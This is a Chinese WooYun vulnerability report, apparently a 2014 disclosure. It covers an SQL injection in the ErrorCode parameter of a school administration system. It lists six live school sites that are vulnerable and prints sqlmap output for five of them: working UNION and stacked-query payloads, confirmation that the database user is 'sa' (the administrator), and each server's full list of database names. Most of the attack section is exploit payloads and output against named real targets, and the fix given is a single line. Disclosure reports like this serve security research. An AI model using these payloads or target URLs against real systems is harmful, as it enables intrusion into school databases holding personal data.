漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082279
漏洞标题:某通用型校园校务系统SQL注入
相关厂商:南京苏亚星资讯科技开发有限公司
漏洞作者: Mr.leo
提交时间:2014-11-07 17:20
修复时间:2015-02-05 17:22
公开时间:2015-02-05 17:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-07: 细节已通知厂商并且等待厂商处理中
2014-11-11: 厂商已经确认,细节仅向厂商公开
2014-11-14: 细节向第三方安全合作伙伴开放
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-05: 细节向公众公开
简要描述:
boom!!!
详细说明:
厂商:南京苏亚星资讯科技开发有限公司
校务系统输入任意用户名、密码,点击登录,报错的url存在注入漏洞
搜索引擎的案例如下:
ErrorCode参数存在注入
http://www.sdwhys.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.zjnksyzx.com:8801/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.lcxyz.com:21245/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.suyaxing.com:81/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.hwsyxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
http://www.dlwsxx.com/SM2005/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004
前五个验证通用型 全是sa权限
1、Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-9683' UNION ALL SELECT CHAR(58)+CHAR(103)+CHAR(100)+CHAR
(120)+CHAR(58)+CHAR(110)+CHAR(108)+CHAR(114)+CHAR(115)+CHAR(109)+CHAR(65)+CHAR(1
22)+CHAR(76)+CHAR(75)+CHAR(119)+CHAR(58)+CHAR(103)+CHAR(98)+CHAR(111)+CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--
---
[16:24:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:24:17] [INFO] fetching current user
[16:24:22] [INFO] heuristics detected web page charset 'ascii'
[16:24:22] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:24:22] [INFO] fetching current database
current database: 'SM2005'
[16:24:27] [INFO] fetching database names
[16:24:31] [INFO] the SQL query used returns 14 entries
[16:24:36] [INFO] retrieved: "aaa"
[16:24:41] [INFO] retrieved: "Jupiter5"
[16:24:45] [INFO] retrieved: "master"
[16:24:50] [INFO] retrieved: "Merak"
[16:24:54] [INFO] retrieved: "model"
[16:24:59] [INFO] retrieved: "msdb"
[16:25:04] [INFO] retrieved: "Northwind"
[16:25:08] [INFO] retrieved: "pubs"
[16:25:13] [INFO] retrieved: "SM2005"
[16:25:17] [INFO] retrieved: "SRP2003"
[16:25:43] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[16:25:52] [INFO] retrieved: "tempdb"
[16:25:57] [INFO] retrieved: "vc2003"
[16:26:02] [INFO] retrieved: "Vod2005"
[16:26:15] [INFO] retrieved: "ws2004"
available databases [14]:
[*] aaa
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004
[16:26:15] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[16:26:15] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.sdwhys.com'
2、Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-1530' UNION ALL SELECT CHAR(58)+CHAR(100)+CHAR(113)+CHAR
(120)+CHAR(58)+CHAR(90)+CHAR(67)+CHAR(101)+CHAR(106)+CHAR(80)+CHAR(78)+CHAR(75)+
CHAR(82)+CHAR(103)+CHAR(97)+CHAR(58)+CHAR(106)+CHAR(121)+CHAR(99)+CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--
---
[16:45:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:45:10] [INFO] fetching current user
[16:45:15] [INFO] heuristics detected web page charset 'ascii'
[16:45:15] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:45:15] [INFO] fetching current database
current database: 'SM2005'
[16:45:19] [INFO] fetching database names
[16:45:24] [INFO] the SQL query used returns 13 entries
[16:45:29] [INFO] retrieved: "Jupiter5"
[16:45:33] [INFO] retrieved: "master"
[16:45:38] [INFO] retrieved: "Merak"
[16:45:43] [INFO] retrieved: "model"
[16:45:47] [INFO] retrieved: "msdb"
[16:45:52] [INFO] retrieved: "Northwind"
[16:45:57] [INFO] retrieved: "pubs"
[16:46:02] [INFO] retrieved: "SM2005"
[16:46:06] [INFO] retrieved: "SRP2003"
[16:46:11] [INFO] retrieved: "tempdb"
[16:46:15] [INFO] retrieved: "TempJupiterSa"
[16:46:20] [INFO] retrieved: "Vod2005"
[16:46:25] [INFO] retrieved: "ws2004"
available databases [13]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] Vod2005
[*] ws2004
[16:46:25] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[16:46:25] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.zjnksyzx.com'
3、Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-6910' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(103)+CHAR
(118)+CHAR(58)+CHAR(79)+CHAR(68)+CHAR(67)+CHAR(82)+CHAR(109)+CHAR(66)+CHAR(67)+C
HAR(76)+CHAR(116)+CHAR(66)+CHAR(58)+CHAR(121)+CHAR(104)+CHAR(97)+CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--
---
[16:39:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[16:39:13] [INFO] fetching current user
[16:39:14] [INFO] heuristics detected web page charset 'ascii'
[16:39:14] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:39:14] [INFO] fetching current database
current database: 'SM2005'
[16:39:14] [INFO] fetching database names
[16:39:14] [INFO] the SQL query used returns 13 entries
[16:39:14] [INFO] retrieved: "Jupiter5"
[16:39:14] [INFO] retrieved: "master"
[16:39:15] [INFO] retrieved: "Merak"
[16:39:15] [INFO] retrieved: "model"
[16:39:15] [INFO] retrieved: "msdb"
[16:39:15] [INFO] retrieved: "ReportServer"
[16:39:15] [INFO] retrieved: "ReportServerTempDB"
[16:39:16] [INFO] retrieved: "SM2005"
[16:39:16] [INFO] retrieved: "SRP2003"
[16:39:16] [INFO] retrieved: "tempdb"
[16:39:16] [INFO] retrieved: "vc2003"
[16:39:16] [INFO] retrieved: "Vod2005"
[16:39:17] [INFO] retrieved: "ws2004"
available databases [13]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SM2005
[*] SRP2003
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004
[16:39:17] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[16:39:17] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com'
4、Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-1507' UNION ALL SELECT CHAR(58)+CHAR(116)+CHAR(97)+CHAR(
104)+CHAR(58)+CHAR(108)+CHAR(79)+CHAR(121)+CHAR(98)+CHAR(82)+CHAR(103)+CHAR(119)
+CHAR(86)+CHAR(105)+CHAR(107)+CHAR(58)+CHAR(120)+CHAR(115)+CHAR(99)+CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--
---
[16:45:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:45:31] [INFO] fetching current user
[16:45:36] [INFO] heuristics detected web page charset 'ascii'
[16:45:36] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[16:45:36] [INFO] fetching current database
current database: 'SM2005'
[16:45:40] [INFO] fetching database names
[16:45:45] [INFO] the SQL query used returns 23 entries
[16:45:49] [INFO] retrieved: "Jupiter5"
[16:45:54] [INFO] retrieved: "master"
[16:45:59] [INFO] retrieved: "Merak"
[16:46:03] [INFO] retrieved: "model"
[16:46:08] [INFO] retrieved: "msdb"
[16:46:12] [INFO] retrieved: "Northwind"
[16:46:17] [INFO] retrieved: "pubs"
[16:46:21] [INFO] retrieved: "Sco_CRM"
[16:46:26] [INFO] retrieved: "Sco_CSM"
[16:46:30] [INFO] retrieved: "Sco_Document"
[16:46:35] [INFO] retrieved: "Sco_Financial"
[16:46:39] [INFO] retrieved: "Sco_Inventory"
[16:46:44] [INFO] retrieved: "Sco_Personnel"
[16:46:49] [INFO] retrieved: "Sco_Platform"
[16:46:53] [INFO] retrieved: "Sco_Portal"
[16:46:58] [INFO] retrieved: "SM2005"
[16:47:02] [INFO] retrieved: "SRP2003"
[16:47:07] [INFO] retrieved: "tempdb"
[16:47:11] [INFO] retrieved: "TempJupiterSa"
[16:47:16] [INFO] retrieved: "test"
[16:47:20] [INFO] retrieved: "vc2003"
[16:47:25] [INFO] retrieved: "web"
[16:47:29] [INFO] retrieved: "ws2004"
available databases [23]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Sco_CRM
[*] Sco_CSM
[*] Sco_Document
[*] Sco_Financial
[*] Sco_Inventory
[*] Sco_Personnel
[*] Sco_Platform
[*] Sco_Portal
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] test
[*] vc2003
[*] web
[*] ws2004
[16:47:30] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[16:47:30] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com'
5、Place: GET
Parameter: ErrorCode
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ErrorCode=-3029' UNION ALL SELECT CHAR(58)+CHAR(98)+CHAR(113)+CHAR(
105)+CHAR(58)+CHAR(67)+CHAR(108)+CHAR(88)+CHAR(80)+CHAR(100)+CHAR(71)+CHAR(88)+C
HAR(66)+CHAR(69)+CHAR(116)+CHAR(58)+CHAR(102)+CHAR(106)+CHAR(122)+CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ErrorCode=30004'; WAITFOR DELAY '0:0:5';--
---
[17:41:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[17:41:19] [INFO] fetching current user
[17:41:24] [INFO] heuristics detected web page charset 'ascii'
[17:41:24] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[17:41:24] [INFO] fetching current database
current database: 'SM2005'
[17:41:29] [INFO] fetching database names
[17:41:33] [INFO] the SQL query used returns 13 entries
[17:41:38] [INFO] retrieved: "Jupiter5"
[17:41:42] [INFO] retrieved: "master"
[17:41:47] [INFO] retrieved: "Merak"
[17:41:52] [INFO] retrieved: "model"
[17:41:56] [INFO] retrieved: "msdb"
[17:42:01] [INFO] retrieved: "Northwind"
[17:42:06] [INFO] retrieved: "pubs"
[17:42:10] [INFO] retrieved: "SM2005"
[17:42:15] [INFO] retrieved: "SRP2003"
[17:42:19] [INFO] retrieved: "tempdb"
[17:42:24] [INFO] retrieved: "vc2003"
[17:42:29] [INFO] retrieved: "Vod2005"
[17:42:33] [INFO] retrieved: "ws2004"
available databases [13]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004
[17:42:33] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[17:42:33] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com'
漏洞证明:
已经证明
修复方案:
过滤参数
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2014-11-11 14:25
厂商回复:
最新状态:
暂无